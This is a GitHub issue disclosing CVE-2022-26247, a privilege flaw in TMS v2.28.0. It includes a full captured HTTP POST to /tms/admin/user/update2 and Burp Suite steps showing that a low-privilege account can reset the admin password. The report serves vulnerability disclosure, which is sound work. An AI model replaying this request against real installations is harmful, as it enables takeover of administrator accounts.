Headline
CVE-2022-26247: There is a Insecure Permissions vulnerability exists in tms · Issue #16 · xiweicheng/tms
TMS v2.28.0 contains an insecure permissions vulnerability via the component /TMS/admin/user/Update2. This vulnerability allows attackers to modify the administrator account and password.
[Suggested description]
There is an ultra vires vulnerability in the function of modifying personal information in TMS.The vulnerability originates from / TMS / admin / user / Update2. The administrator account and password can be modified beyond his authority by modifying the packet parameters.
[Vulnerability Type]
Insecure Permissions
[Vendor of Product]
https://github.com/xiweicheng/tms
[Affected Product Code Base]
v2.28.0
[Affected Component]
POST /tms/admin/user/update2 HTTP/1.1
Host: localhost:8080
Content-Length: 66
sec-ch-ua: " Not A;Brand";v="99", “Chromium";v="92”
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/tms/admin/user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=B45BEAFD82AAE86E3D98FE866FA0851E; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645604517; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1645604534
Connection: close
username=admin&password=88888888&name=admin&mail=admin%40google.com&=
[Attack Type]
Remote
[Vulnerability proof]
1.Access with test account http://localhost:8080/tms/admin
2.In order to verify the authenticity of the ultra vires vulnerability, I have prepared a system administrator account. Account number: admin, default password: 88888888.
Now I log in to the test account to try to change the information and password of the admin account.
3.Click the user icon in the upper right corner and select Modify in the drop-down box to open the modify personal information pop-up window.
4.Because there is no need to verify the user’s original password, you can set the new password directly. Here, the password is set as change123 in the form submission, and other information will not be changed. Open the burpsuite packet capturing agent - > click the confirm submit button.
5.Modify the packet capture data, as shown in the following figure.
6.Click forwad to finish the modification.
The information of viewing admin has changed.Vulnerability recurrence completed.